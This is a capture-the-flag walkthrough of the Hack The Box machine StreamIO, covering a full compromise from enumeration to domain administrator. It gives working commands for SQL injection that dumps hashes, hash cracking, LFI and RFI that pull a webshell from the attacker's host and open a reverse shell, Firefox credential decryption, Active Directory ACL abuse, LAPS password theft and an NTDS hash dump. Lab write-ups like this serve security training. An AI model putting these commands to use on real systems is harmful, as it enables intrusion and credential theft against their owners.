> For the complete documentation index, see [llms.txt](https://blind0bandit.gitbook.io/blog/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://blind0bandit.gitbook.io/blog/windows-machines/medium/htb-streamio.md).
# HTB - StreamIO
## Machine Info
StreamIO is a medium machine that covers subdomain enumeration leading to an SQL injection in order to retrieve stored user credentials, which are cracked to gain access to an administration panel. The administration panel is vulnerable to LFI, which allows us to retrieve the source code for the administration pages and leads to identifying a remote file inclusion vulnerability, the abuse of which gains us access to the system. After the initial shell we leverage the SQLCMD command line utility to enumerate databases and obtain further credentials used in lateral movement. As the secondary user we found Firefox profile contains database which can extract saved credentials from it. Using the new credentials within BloodHound we discover that the user has the ability to add themselves to a specific group in which they can read LDAP secrets. Without direct access to the account, we use PowerShell to abuse this feature and add ourselves to the \`Core Staff\` group, then access LDAP to disclose the administrator LAPS password.
## Enumeration
***
**Scope**
> IP Address: 10.10.11.158
**Nmap Scan**
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
443/tcp open https syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ nmap -p53,80,88,135,139,389,443,445,464,593,3268,3269,5985 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-09 09:09:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after: 2022-03-24T07:03:28
|_ssl-date: 2024-07-09T09:10:11+00:00; +7h00m03s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-09T09:09:33
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s
```
```
* Open ports: 53,80,88,135,139,389,443,445,464,593,3268,3269,5985
* UDP Open ports: 53,88,123,389
* Services: DNS - HTTP - HTTPS - RPC - SMB - KERBEROS - LDAP - winRM
* Versions: IIS httpd 10.0
* Important Notes: Domain: streamIO.htb - DNS:watch.streamIO.htb
```
Before I start enumeration process, I will update `/etc/hosts` with the info from Nmap script output
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ sudo sh -c "echo '$ip streamIO.htb watch.streamIO.htb' >> /etc/hosts"
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ tail -n1 /etc/hosts
10.10.11.158 streamIO.htb watch.streamIO.htb
```
**DNS Enumeration**
I tried zone transfer but failed
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ dig axfr streamIO.htb @$ip
; <<>> DiG 9.19.19-1-Debian <<>> axfr streamIO.htb @10.10.11.158
;; global options: +cmd
; Transfer failed.
```
**RPC & SMB Enumeration**
I got access denied when enumerating the two services
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ rpcclient -U "%" $ip
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
```
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ smbclient -N -L //$ip
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.11.158 445 DC [-] streamIO.htb\: STATUS_ACCESS_DENIED
```
**KERBEROS Enumeration**
Then, I attempted to enumerate username looking for possible path but also nothing found
```BASH
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ kerbrute userenum --dc $ip -d StreamIO.htb -t 100 -o users.list /usr/share/wordlists/seclists/Usernames/jsmith.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
2024/07/08 22:27:10 > Done! Tested 48705 usernames (0 valid) in 57.952 seconds
```
**HTTP & HTTPS enumeration**
`http://10.10.11.158`
`https://10.10.11.158`
I tried fuzzing subdomains, but nothing found, however when I tried subdomain fuzzing against `https` protocol, I got a hit
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip/ -H "Host: FUZZ.StreamIO.htb" -fs 703 -t 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
:: Progress: [19966/19966] :: Job [1/1] :: 444 req/sec :: Duration: [0:01:00] :: Errors: 0 ::
```
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u https://$ip/ -H "Host: FUZZ.StreamIO.htb" -fs 703 -t 200 -k
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
watch [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 1478ms]
```
`https://watch.streamIO.htb`
I looked at `Wappalyzer` to see what technology being used and `PHP` took my attention as it's not common to run `php` on `IIS,` So I attempted directory fuzzing against `https://watch.streamIO.htb`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt:FUZZ -u https://watch.streamIO.htb/FUZZ -k -t 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
index.php [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 2171ms]
search.php [Status: 200, Size: 253887, Words: 1, Lines: 1, Duration: 3382ms]
Index.php [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 867ms]
```
Also, attempt php files fuzzing on `https://steamIO.htb`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt:FUZZ -u https://streamIO.htb/FUZZ -t 200 -k
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
index.php [Status: 200, Size: 13497, Words: 5027, Lines: 395, Duration: 366ms]
login.php [Status: 200, Size: 4145, Words: 796, Lines: 111, Duration: 479ms]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 470ms]
about.php [Status: 200, Size: 7825, Words: 2228, Lines: 231, Duration: 786ms]
register.php [Status: 200, Size: 4500, Words: 905, Lines: 121, Duration: 841ms]
contact.php [Status: 200, Size: 6434, Words: 2010, Lines: 206, Duration: 1200ms]
```
`https://streamIO.htb/login.php`
I don't have any credentials, So I will return if obtained one.
`https://watch.streamIO.htb/search.php`
It's a search function that searches of film name in specific table which can be considered as database, and we can attempt sql injection.
When I delivered a simple payload, I get blocked by some security defences in place
`blocked.php`
So, I can't use `SQLMap` and I will continue manually.
Something interesting took my attention here. when I type a word like `man` it matched it from both side.
It returns `Batman`, `Anger Management` so it uses wildcard such as `*Search*`.
The SQL Command maybe like this
```SQL
SELECT * From movies where Film_name = '*input*'
```
I can break the code with something like that `input';--`
```
SELECT * From movies where Film_name = '*input';-- *'
```
I was right and when I typed `man';--` It matches only wildcard from right side as we already escape the left side
Let's Create our exploit, I tried `union 1,2,...` until I got a hit at `union 1,2,3,4,5,6`
```SQL
SELECT * From movies where Film_name = '*anything' union select 1,2,3,4,5,6 -- *'
```
Field `2` is got triggered So I will inject command on it
So, we're dealing with `MSSQL` database, we can use command from this cheat sheet:
{% embed url="" %}
Get the use name:
Current Database:
We're on MSSQL database, So one common attack vector is that we can get the hash on current use by executing the following command. I did it but failed as I got the machine account hash and couldn't be cracked
```sql
anthing' EXEC master..xp_dirtree '\\10.10.16.3\share\';--
```
Continue to explore the database
We're already in `STREAMIO`, Let's explore the tables
When I provided an asterisk `*` it didn't return anything but when I provide `username` it returned list of usernames
when I provide `password,` it returned list of hashes, but I can't copy and paste them one by one, it's a waste of time
I looked at burp to see the HTML tag that the hashes is included in
So, I will use `curl` command to get a list of hashes and filter the results
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ curl -k -XPOST https://watch.streamIO.htb/search.php -d "q=anything' union select 1,password,3,4,5,6 FROM users;--" | grep '
' | awk '{print $2}' | cut -d\> -f2 | tee -a hashes.txt
0049ac57646627b8d7aeaccf8b6a936f
08344b85b329d7efd611b7a7743e8a09
083ffae904143c4796e464dac33c1f7d
0cfaaaafb559f081df2befbe66686de0
```
I will do the same thing with `usernames`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ curl -k -XPOST https://watch.streamIO.htb/search.php -d "q=anything' union select 1,username,3,4,5,6 FROM users;--" | grep '
' | awk '{print $2}' | cut -d\> -f2 | tee -a users.txt
Theodore
Victor
Victoria
William
yoshihide
```
## Initial Access
***
The username list is big for brute forcing so I will try to know who is really has account on the machine by enumerating `Kerberos`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ kerbrute userenum --dc $ip -d streamIO.htb -t 100 -o users.list ./users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
2024/07/09 00:35:59 > [+] VALID USERNAME: yoshihide@streamIO.htb
```
I got a user's list and hashes list, Let's attempt to crack the hashed and then try brute forcing.
First, Start `hashcat` in auto-detection mode the know the type of hash
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat hashes.txt /usr/share/wordlists/rockyou.txt ======+============================================================+===================
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
70 | md5(utf16le($pass)) | Raw Hash
2600 | md5(md5($pass)) | Raw Hash salted and/or iterated
3500 | md5(md5(md5($pass))) | Raw Hash salted and/or iterated
4400 | md5(sha1($pass)) | Raw Hash salted and/or iterated
20900 | md5(sha1($pass).md5($pass).sha1($pass)) | Raw Hash salted and/or iterated
4300 | md5(strtoupper(md5($pass))) | Raw Hash salted and/or iterated
1000 | NTLM | Operating System
9900 | Radmin2 | Operating System
8600 | Lotus Notes/Domino 5 | Enterprise Application Software (EAS)
```
Not all the hash cracked but we will be fine with what we found
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
Session..........: hashcat
Status...........: Exhausted
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --show
08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$
3577c47eb1e12c8ba021611e1280753c:highschoolmusical
54c88b2dbd7b1a84012fabc1a4c73415:$hadoW
665a50ac9eaa781e4f7f04199db97a11:paddpadd
6dcd87740abb64edfa36d170f0d5450d:$3xybitch
b22abb47a02b52d5dfa27fb0b534f693:!5psycho8!
b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123
ee0b8a0937abd60c2882eacb2f8dc49f:physics69i
ef8f3d30a856cf166fb8215aca93e9ff:%$clara
f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
```
Creating passwords list for brute forcing
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --show | cut -d: -f2 | tee -a pass.lst
highschoolmusical
$hadoW
paddpadd
```
Unfortunately, I didn't get a hit when I tried brute forcing
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u yoshihide -p pass.lst
SMB 10.10.11.158 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:##123a8j8w5123## STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:$monique$1991$ STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:highschoolmusical STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:$hadoW STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:paddpadd STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:$3xybitch STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:!5psycho8! STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:66boysandgirls.. STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:!?Love?!123 STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:physics69i STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:%$clara STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:!!sabrina$ STATUS_LOGON_FAILURE
```
I remember the `login.php` page that I left behind as I didn't have any credentials.
Intercept the request and send it to `intruder` and then start the attack with passwords we have
Fuzzing for '/admin' directory and parameters
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u https://streamIO.htb/FUZZ -t 200 -k
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
images [Status: 301, Size: 151, Words: 9, Lines: 2, Duration: 694ms]
admin [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 1498ms]
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt:FUZZ -u https://streamIO.htb/admin/FUZZ -t 200 -k
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
index.php [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 901ms]
master.php [Status: 200, Size: 58, Words: 5, Lines: 2, Duration: 617ms]
```
`https://streamio.htb/admin/master.php`
There is a missing parameter or something, Let's try parameter fuzzing
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u https://streamIO.htb/admin/?FUZZ= -t 200 -k -fs 1678 -H "Cookie: PHPSESSID=nnt2pl59ell9hqjdvu82ugegpf"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
debug [Status: 200, Size: 1712, Words: 90, Lines: 50, Duration: 987ms]
movie [Status: 200, Size: 320235, Words: 15986, Lines: 10791, Duration: 596ms]
user [Status: 200, Size: 2073, Words: 146, Lines: 63, Duration: 1524ms]
staff [Status: 200, Size: 12484, Words: 1784, Lines: 399, Duration: 8876ms]
```
`https://streamio.htb/admin/?debug=`
I tried `LFI` in this parameter and I got a hit `https://streamio.htb/admin/?debug=C:\Windows\System32\drivers\etc\hosts`
I will use this vulnerability to read the content of `master.php` using php wrapper
### **Shell as yoshihide**
```bash
echo "onlyPGgxPk1vdmllIG1hbmFnbW......." | base64 -d | tee -a master.php
```
The file is check it has to be included
```bash
cat master.php
```
Looking at the end of code, It takes the input in parameter `include` in POST request.
```php
```
I will include `master.php` from `https://streamio.htb/admin/?debug=` and append `inlcude` parameter to the POST request to meet the conditions.
We have found `LFI` before but `RFI` didn't work on `Debug=` parameter, So I will try `RFI` on `include` parameter
we got a hit, Let's create a webshell for us.
```bash
system("PowerShell -c powershell -e ");
```
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ curl -XPOST https://streamio.htb/admin/?debug=master.php -d "include=http://10.10.16.3/shell.php" -H "Cookie: PHPSESSID=nujp4k6q68sd43p4jc439fuepo" -k
```
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.158] 59891
PS C:\inetpub\streamio.htb\admin>
```
I looked around, found `login.php` and decided to explore its content
```PowerShell
PS C:\inetpub\streamio.htb> dir
Directory: C:\inetpub\streamio.htb
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/22/2022 2:49 AM admin
d----- 2/22/2022 2:49 AM css
d----- 2/22/2022 2:49 AM fonts
d----- 2/22/2022 2:49 AM images
d----- 2/22/2022 3:19 AM js
-a---- 2/23/2022 2:16 AM 4341 about.php
-a---- 2/23/2022 2:16 AM 1357 about_include.php
-a---- 2/23/2022 2:16 AM 2908 contact.php
-a---- 2/23/2022 2:16 AM 1706 contact_include.php
-a---- 7/30/2021 1:57 AM 1150 favicon.ico
-a---- 2/22/2022 3:21 AM 1812 header_include.php
-a---- 2/25/2022 11:57 PM 7337 index.php
-a---- 2/23/2022 2:16 AM 2415 info_include.php
-a---- 2/26/2022 8:27 AM 3938 login.php
-a---- 2/23/2022 2:16 AM 216 logout.php
-a---- 2/25/2022 11:42 PM 4480 register.php
PS C:\inetpub\streamio.htb> type login.php
"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
$handle = sqlsrv_connect('(local)',$connection);
function bad_char_check($name
```
I searched for other passwords that maybe exists and find one
```PowerShell
PS C:\inetpub\streamio.htb> ls -Force | select-string -pattern "PWD"
login.php:46:$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
register.php:81: $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
```
It's a password for `mssql database`
```
db_user:'B1@hB1@hB1@h'
db_admin:'B1@hx31234567890'
```
### **Shell as nikk37**
Let's examine the `db` with `SQLCMD` tool
```PowerShell
PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_user -P 'B1@hB1@hB1@h' -Q "select @@version"
----------------------------------------------------------------------------------------
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 (Build 17763: ) (Hypervisor)
(1 rows affected)
```
```PowerShell
PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_admin -P 'B1@hx31234567890' -Q "use streamio_backup"
Changed database context to 'streamio_backup'.
PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_admin -P 'B1@hx31234567890' -Q "SELECT table_name FROM streamio_backup.INFORMATION_SCHEMA.TABLES"
table_name
----------------------------------------------------------------------------------------
movies
users
PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_admin -P 'B1@hx31234567890' -d 'streamio_backup' -Q "select * from users"
id username password
----------- -------------------------------------------------- -------------------------
1 nikk37 389d14cb8e4e9b94b137deb1caf0612a
2 yoshihide b779ba15cedfd22a023c4d8bcf5f2332
3 James c660060492d9edcaa8332d89c99c9239
4 Theodore 925e5408ecb67aea449373d668b7359e
5 Samantha 083ffae904143c4796e464dac33c1f7d
6 Lauren 08344b85b329d7efd611b7a7743e8a09
7 William d62be0dc82071bccc1322d64ec5b6c51
8 Sabrina f87d3c0d6c8fd686aacc6627f1f493a5
```
shorten our users list by ensuring that the username already exists
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ kerbrute userenum --dc $ip -d StreamIO.htb -t 100 -o users.list ./backup_users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
2024/07/09 03:41:07 > [+] VALID USERNAME: yoshihide@StreamIO.htb
2024/07/09 03:41:07 > [+] VALID USERNAME: nikk37@StreamIO.htb
```
Only one hash was cracked, So it must be for one of the two users
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat -m 0 backup_hashes /usr/share/wordlists/rockyou.txt
389d14cb8e4e9b94b137deb1caf0612a:get_dem_girls2xxxxxxxxxxxx
```
Confirm
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u 'nikk37' -p 'get_dem_girls2xxxxxxxxx'
SMB 10.10.11.158 445 DC [+] streamIO.htb\nikk37:get_dem_girls2xxxxxxxxx
```
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ evil-winrm -i $ip -u nikk37 -p 'get_dem_girls2xxxxxxxxxx'
*Evil-WinRM* PS C:\Users\nikk37\Documents> type ..\Desktop\user.txt
a00c4e521d2bed26c166xxxxxxxxxxxxx
```
> User Flag: a00c4e521d2bed26c166xxxxxxxxxxxxx
***
## Privilege Escalation
I found that the system has `Mozilla Firefox` installed, So I looked at the user Mozilla profile and I copied it to my kali machine to try decrypt the Firefox secrets and cookies
Start SMB Server
```bash
──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ smbserver
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```
```powershell
*Evil-WinRM* PS C:\Users\nikk37> net use z: \\10.10.16.3\share /user:blind0bandit blind0bandit
The command completed successfully.
*Evil-WinRM* PS C:\Users\nikk37> copy -r AppData\Roaming\Mozilla\FireFox\Profiles\br53rxeg.default-release\ z:
```
I change directory the folder I copied from windows box and start `firepwd.py` to decrypt Firefox secrets.
{% embed url="" %}
```bash
┌──(kali㉿kali)-[~/…/HTB/machines/StreamIO/br53rxeg.default-release]
└─$ python3 /opt/firepwd/firepwd.py
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
```
I found some credentials let's try them on brute forcing account
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u fire_users -p admin_passwords
SMB 10.10.11.158 445 DC [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r
```
* I fired up bloodhound to see what the user `JDgodd` can do and file the following:
* `JDgodd` Can `writeOwner` on `CORE STAFF` group which enable use to add ourselves in that group
* `CORE STAFF` group has the rights to read `LAPS` password on the `DC` machine
Let's list the command we will use for that purpose:
```powershell
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('STREAMIO.HTB\JDGodd', $SecPassword)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd"
Add-DomainGroupMember -Credential $cred -Identity "Core Staff" -Members "StreamIO\JDgodd"
```
I personally use `crackmapexec` to pull the laps
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u 'JDGodd' -p 'JDg0dd1s@d0p3cr3@t0r' --laps
SMB 10.10.11.158 445 DC [-] DC\administrator:G58E)u0@)96rU1 STATUS_LOGON_FAILURE
```
Alternative way from the community using `ldapsearch`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ldapsearch -H ldap://10.10.11.158 -b 'DC=streamIO,DC=htb' -x -D JDgodd@streamio.htb -w 'JDg0dd1s@d0p3cr3@t0r' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
dn: CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
ms-Mcs-AdmPwd: G58E)u0@)96rU1
```
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ impacket-psexec streamip.htb/administrator@$ip
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
C:\Windows\system32> type C:\Users\Martin\Desktop\root.txt
fcca05f1388d18d964521ce53582793
```
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u administrator -p 'G58E)u0@)96rU1' --ntds
SMB 10.10.11.158 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.158 445 DC [+] streamIO.htb\administrator:G58E)u0@)96rU1 (Pwn3d!)
SMB 10.10.11.158 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.11.158 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:63ab0c9344ca0c42ce367de76cafec16:::
SMB 10.10.11.158 445 DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.11.158 445 DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1:::
SMB 10.10.11.158 445 DC JDgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af:::
SMB 10.10.11.158 445 DC Martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377:::
SMB 10.10.11.158 445 DC nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764:::
